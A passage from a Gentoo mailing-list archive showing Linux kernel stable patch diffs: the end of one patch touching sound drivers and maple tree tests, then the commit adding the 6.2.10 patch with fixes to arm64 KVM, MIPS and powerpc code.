+ 		per_pin->pin_nid = pin_nid;
+ 		per_pin->pin_nid_idx = spec->num_nids;
+ 		per_pin->dev_id = i;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 070150bbd3559..50b8573b52066 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -2624,6 +2624,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1462, 0xda57, "MSI Z270-Gaming", ALC1220_FIXUP_GB_DUAL_CODECS),
+ 	SND_PCI_QUIRK_VENDOR(0x1462, "MSI", ALC882_FIXUP_GPIO3),
+ 	SND_PCI_QUIRK(0x147b, 0x107a, "Abit AW9D-MAX", ALC882_FIXUP_ABIT_AW9D_MAX),
++	SND_PCI_QUIRK(0x1558, 0x3702, "Clevo X370SN[VW]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x50d3, "Clevo PC50[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65d1, "Clevo PB51[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65d2, "Clevo PB51R[CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+@@ -9442,6 +9443,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b87, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/codecs/hdac_hdmi.c b/sound/soc/codecs/hdac_hdmi.c
+index ed4f7cdda04ff..8b6b760296948 100644
+--- a/sound/soc/codecs/hdac_hdmi.c
++++ b/sound/soc/codecs/hdac_hdmi.c
+@@ -436,23 +436,28 @@ static int hdac_hdmi_setup_audio_infoframe(struct hdac_device *hdev,
+ 	return 0;
+ }
+ 
+-static int hdac_hdmi_set_tdm_slot(struct snd_soc_dai *dai,
+-		unsigned int tx_mask, unsigned int rx_mask,
+-		int slots, int slot_width)
++static int hdac_hdmi_set_stream(struct snd_soc_dai *dai,
++				void *stream, int direction)
+ {
+ 	struct hdac_hdmi_priv *hdmi = snd_soc_dai_get_drvdata(dai);
+ 	struct hdac_device *hdev = hdmi->hdev;
+ 	struct hdac_hdmi_dai_port_map *dai_map;
+ 	struct hdac_hdmi_pcm *pcm;
++	struct hdac_stream *hstream;
+ 
+-	dev_dbg(&hdev->dev, "%s: strm_tag: %d\n", __func__, tx_mask);
++	if (!stream)
++		return -EINVAL;
++
++	hstream = (struct hdac_stream *)stream;
++
++	dev_dbg(&hdev->dev, "%s: strm_tag: %d\n", __func__, hstream->stream_tag);
+ 
+ 	dai_map = &hdmi->dai_map[dai->id];
+ 
+ 	pcm = hdac_hdmi_get_pcm_from_cvt(hdmi, dai_map->cvt);
+ 
+ 	if (pcm)
+-		pcm->stream_tag = (tx_mask << 4);
++		pcm->stream_tag = (hstream->stream_tag << 4);
+ 
+ 	return 0;
+ }
+@@ -1544,7 +1549,7 @@ static const struct snd_soc_dai_ops hdmi_dai_ops = {
+ 	.startup = hdac_hdmi_pcm_open,
+ 	.shutdown = hdac_hdmi_pcm_close,
+ 	.hw_params = hdac_hdmi_set_hw_params,
+-	.set_tdm_slot = hdac_hdmi_set_tdm_slot,
++	.set_stream = hdac_hdmi_set_stream,
+ };
+ 
+ /*
+diff --git a/sound/soc/codecs/lpass-rx-macro.c b/sound/soc/codecs/lpass-rx-macro.c
+index 8621cfabcf5b6..1639f3b66facb 100644
+--- a/sound/soc/codecs/lpass-rx-macro.c
++++ b/sound/soc/codecs/lpass-rx-macro.c
+@@ -3667,9 +3667,9 @@ static int __maybe_unused rx_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(rx->regmap, true);
+ 	regcache_mark_dirty(rx->regmap);
+ 
+-	clk_disable_unprepare(rx->mclk);
+-	clk_disable_unprepare(rx->npl);
+ 	clk_disable_unprepare(rx->fsgen);
++	clk_disable_unprepare(rx->npl);
++	clk_disable_unprepare(rx->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 8facdb922f076..9f33289ce2174 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -2093,9 +2093,9 @@ static int __maybe_unused tx_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(tx->regmap, true);
+ 	regcache_mark_dirty(tx->regmap);
+ 
+-	clk_disable_unprepare(tx->mclk);
+-	clk_disable_unprepare(tx->npl);
+ 	clk_disable_unprepare(tx->fsgen);
++	clk_disable_unprepare(tx->npl);
++	clk_disable_unprepare(tx->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index c0b86d69c72e3..01149b20b4c93 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -2504,9 +2504,9 @@ static int __maybe_unused wsa_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(wsa->regmap, true);
+ 	regcache_mark_dirty(wsa->regmap);
+ 
+-	clk_disable_unprepare(wsa->mclk);
+-	clk_disable_unprepare(wsa->npl);
+ 	clk_disable_unprepare(wsa->fsgen);
++	clk_disable_unprepare(wsa->npl);
++	clk_disable_unprepare(wsa->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/sof/ipc4-topology.c b/sound/soc/sof/ipc4-topology.c
+index 6da6137fa2cbc..4f7adbe671f3e 100644
+--- a/sound/soc/sof/ipc4-topology.c
++++ b/sound/soc/sof/ipc4-topology.c
+@@ -1686,6 +1686,14 @@ static int sof_ipc4_route_setup(struct snd_sof_dev *sdev, struct snd_sof_route *
+ 	u32 header, extension;
+ 	int ret;
+ 
++	if (!src_fw_module || !sink_fw_module) {
++		/* The NULL module will print as "(efault)" */
++		dev_err(sdev->dev, "source %s or sink %s widget weren't set up properly\n",
++			src_fw_module->man4_module_entry.name,
++			sink_fw_module->man4_module_entry.name);
++		return -ENODEV;
++	}
++
+ 	sroute->src_queue_id = sof_ipc4_get_queue_id(src_widget, sink_widget,
+ 						     SOF_PIN_TYPE_SOURCE);
+ 	if (sroute->src_queue_id < 0) {
+diff --git a/sound/soc/sof/ipc4.c b/sound/soc/sof/ipc4.c
+index 74cd7e9560193..280fc89043b16 100644
+--- a/sound/soc/sof/ipc4.c
++++ b/sound/soc/sof/ipc4.c
+@@ -393,6 +393,9 @@ static int sof_ipc4_tx_msg(struct snd_sof_dev *sdev, void *msg_data, size_t msg_
+ static int sof_ipc4_set_get_data(struct snd_sof_dev *sdev, void *data,
+ 				 size_t payload_bytes, bool set)
+ {
++	const struct sof_dsp_power_state target_state = {
++			.state = SOF_DSP_PM_D0,
++	};
+ 	size_t payload_limit = sdev->ipc->max_payload_size;
+ 	struct sof_ipc4_msg *ipc4_msg = data;
+ 	struct sof_ipc4_msg tx = {{ 0 }};
+@@ -423,6 +426,11 @@ static int sof_ipc4_set_get_data(struct snd_sof_dev *sdev, void *data,
+ 
+ 	tx.extension |= SOF_IPC4_MOD_EXT_MSG_FIRST_BLOCK(1);
+ 
++	/* ensure the DSP is in D0i0 before sending IPC */
++	ret = snd_sof_dsp_set_power_state(sdev, &target_state);
++	if (ret < 0)
++		return ret;
++
+ 	/* Serialise IPC TX */
+ 	mutex_lock(&sdev->ipc->tx_mutex);
+ 
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index 81fa7ec2e66a1..1f36bc1c5d362 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -173,11 +173,11 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 
+ 		if (!MAPLE_32BIT) {
+ 			if (i >= 35)
+-				e = i - 35;
++				e = i - 34;
+ 			else if (i >= 5)
+-				e = i - 5;
++				e = i - 4;
+ 			else if (i >= 2)
+-				e = i - 2;
++				e = i - 1;
+ 		} else {
+ 			if (i >= 4)
+ 				e = i - 4;
+@@ -305,17 +305,17 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas.node != MA_ERROR(-ENOMEM));
+ 	MT_BUG_ON(mt, !mas_nomem(&mas, GFP_KERNEL));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS);
+ 
+ 	mn = mas_pop_node(&mas); /* get the next node. */
+ 	MT_BUG_ON(mt, mn == NULL);
+ 	MT_BUG_ON(mt, not_empty(mn));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 2);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
+ 
+ 	mas_push_node(&mas, mn);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS);
+ 
+ 	/* Check the limit of pop/push/pop */
+ 	mas_node_count(&mas, MAPLE_ALLOC_SLOTS + 2); /* Request */
+@@ -323,14 +323,14 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas.node != MA_ERROR(-ENOMEM));
+ 	MT_BUG_ON(mt, !mas_nomem(&mas, GFP_KERNEL));
+ 	MT_BUG_ON(mt, mas_alloc_req(&mas));
+-	MT_BUG_ON(mt, mas.alloc->node_count);
++	MT_BUG_ON(mt, mas.alloc->node_count != 1);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count  != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count  != MAPLE_ALLOC_SLOTS);
+ 	mas_push_node(&mas, mn);
+-	MT_BUG_ON(mt, mas.alloc->node_count);
++	MT_BUG_ON(mt, mas.alloc->node_count != 1);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-06 10:40 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-04-06 10:40 UTC (permalink / raw
  To: gentoo-commits

commit:     552322bbd8665a864a089b06ed41c97e413562b9
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr  6 10:40:26 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr  6 10:40:26 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=552322bb

Linux patch 6.2.10

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |     4 +
 1009_linux-6.2.10.patch | 10600 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10604 insertions(+)

diff --git a/0000_README b/0000_README
index 47edd2da..93bcb21e 100644
--- a/0000_README
+++ b/0000_README
@@ -79,6 +79,10 @@ Patch:  1008_linux-6.2.9.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.9
 
+Patch:  1009_linux-6.2.10.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.10
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1009_linux-6.2.10.patch b/1009_linux-6.2.10.patch
new file mode 100644
index 00000000..980ca4df
--- /dev/null
+++ b/1009_linux-6.2.10.patch
@@ -0,0 +1,10600 @@
+diff --git a/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml b/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
+index 3fe981b14e2cb..54736362378eb 100644
+--- a/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
++++ b/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
+@@ -76,6 +76,13 @@ properties:
+       If "broken-flash-reset" is present then having this property does not
+       make any difference.
+ 
++  spi-cpol: true
++  spi-cpha: true
++
++dependencies:
++  spi-cpol: [ spi-cpha ]
++  spi-cpha: [ spi-cpol ]
++
+ unevaluatedProperties: false
+ 
+ examples:
+diff --git a/Makefile b/Makefile
+index 8732f7208d59b..6ec0ec452e465 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 9
++SUBLEVEL = 10
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/kvm/mmu.c b/arch/arm64/kvm/mmu.c
+index a3ee3b605c9b8..3c24178bd4935 100644
+--- a/arch/arm64/kvm/mmu.c
++++ b/arch/arm64/kvm/mmu.c
+@@ -665,14 +665,33 @@ static int get_user_mapping_size(struct kvm *kvm, u64 addr)
+ 				   CONFIG_PGTABLE_LEVELS),
+ 		.mm_ops		= &kvm_user_mm_ops,
+ 	};
++	unsigned long flags;
+ 	kvm_pte_t pte = 0;	/* Keep GCC quiet... */
+ 	u32 level = ~0;
+ 	int ret;
+ 
++	/*
++	 * Disable IRQs so that we hazard against a concurrent
++	 * teardown of the userspace page tables (which relies on
++	 * IPI-ing threads).
++	 */
++	local_irq_save(flags);
+ 	ret = kvm_pgtable_get_leaf(&pgt, addr, &pte, &level);
+-	VM_BUG_ON(ret);
+-	VM_BUG_ON(level >= KVM_PGTABLE_MAX_LEVELS);
+-	VM_BUG_ON(!(pte & PTE_VALID));
++	local_irq_restore(flags);
++
++	if (ret)
++		return ret;
++
++	/*
++	 * Not seeing an error, but not updating level? Something went
++	 * deeply wrong...
++	 */
++	if (WARN_ON(level >= KVM_PGTABLE_MAX_LEVELS))
++		return -EFAULT;
++
++	/* Oops, the userspace PTs are gone... Replay the fault */
++	if (!kvm_pte_valid(pte))
++		return -EAGAIN;
+ 
+ 	return BIT(ARM64_HW_PGTABLE_LEVEL_SHIFT(level));
+ }
+@@ -1079,7 +1098,7 @@ static bool fault_supports_stage2_huge_mapping(struct kvm_memory_slot *memslot,
+  *
+  * Returns the size of the mapping.
+  */
+-static unsigned long
++static long
+ transparent_hugepage_adjust(struct kvm *kvm, struct kvm_memory_slot *memslot,
+ 			    unsigned long hva, kvm_pfn_t *pfnp,
+ 			    phys_addr_t *ipap)
+@@ -1091,8 +1110,15 @@ transparent_hugepage_adjust(struct kvm *kvm, struct kvm_memory_slot *memslot,
+ 	 * sure that the HVA and IPA are sufficiently aligned and that the
+ 	 * block map is contained within the memslot.
+ 	 */
+-	if (fault_supports_stage2_huge_mapping(memslot, hva, PMD_SIZE) &&
+-	    get_user_mapping_size(kvm, hva) >= PMD_SIZE) {
++	if (fault_supports_stage2_huge_mapping(memslot, hva, PMD_SIZE)) {
++		int sz = get_user_mapping_size(kvm, hva);
++
++		if (sz < 0)
++			return sz;
++
++		if (sz < PMD_SIZE)
++			return PAGE_SIZE;
++
+ 		/*
+ 		 * The address we faulted on is backed by a transparent huge
+ 		 * page.  However, because we map the compound huge page and
+@@ -1192,7 +1218,7 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ {
+ 	int ret = 0;
+ 	bool write_fault, writable, force_pte = false;
+-	bool exec_fault;
++	bool exec_fault, mte_allowed;
+ 	bool device = false;
+ 	unsigned long mmu_seq;
+ 	struct kvm *kvm = vcpu->kvm;
+@@ -1203,7 +1229,7 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 	kvm_pfn_t pfn;
+ 	bool logging_active = memslot_is_logging(memslot);
+ 	unsigned long fault_level = kvm_vcpu_trap_get_fault_level(vcpu);
+-	unsigned long vma_pagesize, fault_granule;
++	long vma_pagesize, fault_granule;
+ 	enum kvm_pgtable_prot prot = KVM_PGTABLE_PROT_R;
+ 	struct kvm_pgtable *pgt;
+ 
+@@ -1217,6 +1243,20 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 		return -EFAULT;
+ 	}
+ 
++	/*
++	 * Permission faults just need to update the existing leaf entry,
++	 * and so normally don't require allocations from the memcache. The
++	 * only exception to this is when dirty logging is enabled at runtime
++	 * and a write fault needs to collapse a block entry into a table.
++	 */
++	if (fault_status != ESR_ELx_FSC_PERM ||
++	    (logging_active && write_fault)) {
++		ret = kvm_mmu_topup_memory_cache(memcache,
++						 kvm_mmu_cache_min_pages(kvm));
++		if (ret)
++			return ret;
++	}
++
+ 	/*
+ 	 * Let's check if we will get back a huge page backed by hugetlbfs, or
+ 	 * get block mapping for device MMIO region.
+@@ -1269,37 +1309,21 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 		fault_ipa &= ~(vma_pagesize - 1);
+ 
+ 	gfn = fault_ipa >> PAGE_SHIFT;
+-	mmap_read_unlock(current->mm);
++	mte_allowed = kvm_vma_mte_allowed(vma);
+ 
+-	/*
+-	 * Permission faults just need to update the existing leaf entry,
+-	 * and so normally don't require allocations from the memcache. The
+-	 * only exception to this is when dirty logging is enabled at runtime
+-	 * and a write fault needs to collapse a block entry into a table.
+-	 */
+-	if (fault_status != ESR_ELx_FSC_PERM ||
+-	    (logging_active && write_fault)) {
+-		ret = kvm_mmu_topup_memory_cache(memcache,
+-						 kvm_mmu_cache_min_pages(kvm));
+-		if (ret)
+-			return ret;
+-	}
++	/* Don't use the VMA after the unlock -- it may have vanished */
++	vma = NULL;
+ 
+-	mmu_seq = vcpu->kvm->mmu_invalidate_seq;
+ 	/*
+-	 * Ensure the read of mmu_invalidate_seq happens before we call
+-	 * gfn_to_pfn_prot (which calls get_user_pages), so that we don't risk
+-	 * the page we just got a reference to gets unmapped before we have a
+-	 * chance to grab the mmu_lock, which ensure that if the page gets
+-	 * unmapped afterwards, the call to kvm_unmap_gfn will take it away
+-	 * from us again properly. This smp_rmb() interacts with the smp_wmb()
+-	 * in kvm_mmu_notifier_invalidate_<page|range_end>.
++	 * Read mmu_invalidate_seq so that KVM can detect if the results of
++	 * vma_lookup() or __gfn_to_pfn_memslot() become stale prior to
++	 * acquiring kvm->mmu_lock.
+ 	 *
+-	 * Besides, __gfn_to_pfn_memslot() instead of gfn_to_pfn_prot() is
+-	 * used to avoid unnecessary overhead introduced to locate the memory
+-	 * slot because it's always fixed even @gfn is adjusted for huge pages.
++	 * Rely on mmap_read_unlock() for an implicit smp_rmb(), which pairs
++	 * with the smp_wmb() in kvm_mmu_invalidate_end().
+ 	 */
+-	smp_rmb();
++	mmu_seq = vcpu->kvm->mmu_invalidate_seq;
++	mmap_read_unlock(current->mm);
+ 
+ 	pfn = __gfn_to_pfn_memslot(memslot, gfn, false, false, NULL,
+ 				   write_fault, &writable, NULL);
+@@ -1350,11 +1374,16 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 			vma_pagesize = transparent_hugepage_adjust(kvm, memslot,
+ 								   hva, &pfn,
+ 								   &fault_ipa);
++
++		if (vma_pagesize < 0) {
++			ret = vma_pagesize;
++			goto out_unlock;
++		}
+ 	}
+ 
+ 	if (fault_status != ESR_ELx_FSC_PERM && !device && kvm_has_mte(kvm)) {
+ 		/* Check the VMM hasn't introduced a new disallowed VMA */
+-		if (kvm_vma_mte_allowed(vma)) {
++		if (mte_allowed) {
+ 			sanitise_mte_tags(kvm, pfn, vma_pagesize);
+ 		} else {
+ 			ret = -EFAULT;
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index 24908400e1906..c243b10f3e150 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -538,7 +538,8 @@ void kvm_pmu_handle_pmcr(struct kvm_vcpu *vcpu, u64 val)
+ 	if (!kvm_pmu_is_3p5(vcpu))
+ 		val &= ~ARMV8_PMU_PMCR_LP;
+ 
+-	__vcpu_sys_reg(vcpu, PMCR_EL0) = val;
++	/* The reset bits don't indicate any state, and shouldn't be saved. */
++	__vcpu_sys_reg(vcpu, PMCR_EL0) = val & ~(ARMV8_PMU_PMCR_C | ARMV8_PMU_PMCR_P);
+ 
+ 	if (val & ARMV8_PMU_PMCR_E) {
+ 		kvm_pmu_enable_counter_mask(vcpu,
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index c6cbfe6b854b3..c48c053d61466 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -765,6 +765,22 @@ static bool pmu_counter_idx_valid(struct kvm_vcpu *vcpu, u64 idx)
+ 	return true;
+ }
+ 
++static int get_pmu_evcntr(struct kvm_vcpu *vcpu, const struct sys_reg_desc *r,
++			  u64 *val)
++{
++	u64 idx;
++
++	if (r->CRn == 9 && r->CRm == 13 && r->Op2 == 0)
++		/* PMCCNTR_EL0 */
++		idx = ARMV8_PMU_CYCLE_IDX;
++	else
++		/* PMEVCNTRn_EL0 */
++		idx = ((r->CRm & 3) << 3) | (r->Op2 & 7);
++
++	*val = kvm_pmu_get_counter_value(vcpu, idx);
++	return 0;
++}
++
+ static bool access_pmu_evcntr(struct kvm_vcpu *vcpu,
+ 			      struct sys_reg_params *p,
+ 			      const struct sys_reg_desc *r)
+@@ -981,7 +997,7 @@ static bool access_pmuserenr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ /* Macro to expand the PMEVCNTRn_EL0 register */
+ #define PMU_PMEVCNTR_EL0(n)						\
+ 	{ PMU_SYS_REG(SYS_PMEVCNTRn_EL0(n)),				\
+-	  .reset = reset_pmevcntr,					\
++	  .reset = reset_pmevcntr, .get_user = get_pmu_evcntr,		\
+ 	  .access = access_pmu_evcntr, .reg = (PMEVCNTR0_EL0 + n), }
+ 
+ /* Macro to expand the PMEVTYPERn_EL0 register */
+@@ -1745,7 +1761,8 @@ static const struct sys_reg_desc sys_reg_descs[] = {
+ 	{ PMU_SYS_REG(SYS_PMCEID1_EL0),
+ 	  .access = access_pmceid, .reset = NULL },
+ 	{ PMU_SYS_REG(SYS_PMCCNTR_EL0),
+-	  .access = access_pmu_evcntr, .reset = reset_unknown, .reg = PMCCNTR_EL0 },
++	  .access = access_pmu_evcntr, .reset = reset_unknown,
++	  .reg = PMCCNTR_EL0, .get_user = get_pmu_evcntr},
+ 	{ PMU_SYS_REG(SYS_PMXEVTYPER_EL0),
+ 	  .access = access_pmu_evtyper, .reset = NULL },
+ 	{ PMU_SYS_REG(SYS_PMXEVCNTR_EL0),
+diff --git a/arch/mips/bmips/dma.c b/arch/mips/bmips/dma.c
+index 33788668cbdbf..3779e7855bd75 100644
+--- a/arch/mips/bmips/dma.c
++++ b/arch/mips/bmips/dma.c
+@@ -5,6 +5,8 @@
+ #include <asm/bmips.h>
+ #include <asm/io.h>
+ 
++bool bmips_rac_flush_disable;
++
+ void arch_sync_dma_for_cpu_all(void)
+ {
+ 	void __iomem *cbr = BMIPS_GET_CBR();
+@@ -15,6 +17,9 @@ void arch_sync_dma_for_cpu_all(void)
+ 	    boot_cpu_type() != CPU_BMIPS4380)
+ 		return;
+ 
++	if (unlikely(bmips_rac_flush_disable))
++		return;
++
+ 	/* Flush stale data out of the readahead cache */
+ 	cfg = __raw_readl(cbr + BMIPS_RAC_CONFIG);
+ 	__raw_writel(cfg | 0x100, cbr + BMIPS_RAC_CONFIG);
+diff --git a/arch/mips/bmips/setup.c b/arch/mips/bmips/setup.c
+index e95b3f78e7cd4..549a6392a3d2d 100644
+--- a/arch/mips/bmips/setup.c
++++ b/arch/mips/bmips/setup.c
+@@ -35,6 +35,8 @@
+ #define REG_BCM6328_OTP		((void __iomem *)CKSEG1ADDR(0x1000062c))
+ #define BCM6328_TP1_DISABLED	BIT(9)
+ 
++extern bool bmips_rac_flush_disable;
++
+ static const unsigned long kbase = VMLINUX_LOAD_ADDRESS & 0xfff00000;
+ 
+ struct bmips_quirk {
+@@ -104,6 +106,12 @@ static void bcm6358_quirks(void)
+ 	 * disable SMP for now
+ 	 */
+ 	bmips_smp_enabled = 0;
++
++	/*
++	 * RAC flush causes kernel panics on BCM6358 when booting from TP1
++	 * because the bootloader is not initializing it properly.
++	 */
++	bmips_rac_flush_disable = !!(read_c0_brcm_cmt_local() & (1 << 31));
+ }
+ 
+ static void bcm6368_quirks(void)
+diff --git a/arch/powerpc/include/asm/book3s/64/tlbflush.h b/arch/powerpc/include/asm/book3s/64/tlbflush.h
+index 2bbc0fcce04a3..5e26c7f2c25ab 100644
+--- a/arch/powerpc/include/asm/book3s/64/tlbflush.h
++++ b/arch/powerpc/include/asm/book3s/64/tlbflush.h
+@@ -148,6 +148,11 @@ static inline void flush_tlb_fix_spurious_fault(struct vm_area_struct *vma,
+ 	 */
+ }
+ 
++static inline bool __pte_protnone(unsigned long pte)
++{
++	return (pte & (pgprot_val(PAGE_NONE) | _PAGE_RWX)) == pgprot_val(PAGE_NONE);
++}
++
+ static inline bool __pte_flags_need_flush(unsigned long oldval,
+ 					  unsigned long newval)
+ {
+@@ -164,8 +169,8 @@ static inline bool __pte_flags_need_flush(unsigned long oldval,
+ 	/*
+ 	 * We do not expect kernel mappings or non-PTEs or not-present PTEs.
+ 	 */
+-	VM_WARN_ON_ONCE(oldval & _PAGE_PRIVILEGED);
+-	VM_WARN_ON_ONCE(newval & _PAGE_PRIVILEGED);
++	VM_WARN_ON_ONCE(!__pte_protnone(oldval) && oldval & _PAGE_PRIVILEGED);
++	VM_WARN_ON_ONCE(!__pte_protnone(newval) && newval & _PAGE_PRIVILEGED);
+ 	VM_WARN_ON_ONCE(!(oldval & _PAGE_PTE));
+ 	VM_WARN_ON_ONCE(!(newval & _PAGE_PTE));
+ 	VM_WARN_ON_ONCE(!(oldval & _PAGE_PRESENT));
+diff --git a/arch/powerpc/kernel/ptrace/ptrace-view.c b/arch/powerpc/kernel/ptrace/ptrace-view.c
+index 2087a785f05f1..5fff0d04b23f7 100644
+--- a/arch/powerpc/kernel/ptrace/ptrace-view.c
++++ b/arch/powerpc/kernel/ptrace/ptrace-view.c
+@@ -290,6 +290,9 @@ static int gpr_set(struct task_struct *target, const struct user_regset *regset,
+ static int ppr_get(struct task_struct *target, const struct user_regset *regset,
+ 		   struct membuf to)
+ {
++	if (!target->thread.regs)
++		return -EINVAL;
++
+ 	return membuf_write(&to, &target->thread.regs->ppr, sizeof(u64));
+ }
+ 
+@@ -297,6 +300,9 @@ static int ppr_set(struct task_struct *target, const struct user_regset *regset,
+ 		   unsigned int pos, unsigned int count, const void *kbuf,
+ 		   const void __user *ubuf)
+ {
++	if (!target->thread.regs)
++		return -EINVAL;
++
+ 	return user_regset_copyin(&pos, &count, &kbuf, &ubuf,
+ 				  &target->thread.regs->ppr, 0, sizeof(u64));
+ }
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 4ad6e510d405f..94c023bb13e05 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -857,6 +857,13 @@ int pseries_vas_dlpar_cpu(void)
+ {
+ 	int new_nr_creds, rc;
+ 
++	/*
++	 * NX-GZIP is not enabled. Nothing to do for DLPAR event
++	 */
++	if (!copypaste_feat)
++		return 0;
++
++
+ 	rc = h_query_vas_capabilities(H_QUERY_VAS_CAPABILITIES,
+ 				      vascaps[VAS_GZIP_DEF_FEAT_TYPE].feat,
+ 				      (u64)virt_to_phys(&hv_cop_caps));
+@@ -1013,6 +1020,7 @@ static int __init pseries_vas_init(void)
+ 	 * Linux supports user space COPY/PASTE only with Radix
+ 	 */
+ 	if (!radix_enabled()) {
++		copypaste_feat = false;
+ 		pr_err("API is supported only with radix page tables\n");
+ 		return -ENOTSUPP;
+ 	}
